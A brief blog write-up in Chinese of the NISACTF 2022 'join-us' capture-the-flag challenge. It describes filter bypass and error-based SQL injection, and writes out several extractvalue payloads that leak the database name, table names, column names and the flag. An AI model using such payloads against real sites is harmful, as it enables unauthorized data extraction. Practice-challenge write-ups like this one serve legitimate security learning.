CHHHCHHOH 's BLOG

[NISACTF 2022]join-us

用fuzz测试了一下,发现union,column,database,sleep等都被过滤了。
但extractvalue可以用,尝试报错注入。
先用 0' || info()--+不存在的函数来报出库名:sqlsql
0'||extractvalue(0,concat(0x7e,(SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema like 'sqlsql')))#
表名:Fal_flag,output
通过join成功注出列名:data
0'||extractvalue(1,concat(0x7e,(select from(select from output a join output b)c),0x7e))#
不过好像也不需要列名
0'||extractvalue(1,concat(0x7e,(select * from sqlsql.output),0x7e))#
0'||extractvalue(1,concat(0x7e,(mid((select * from sqlsql.output),29,28)),0x7e))#

添加新评论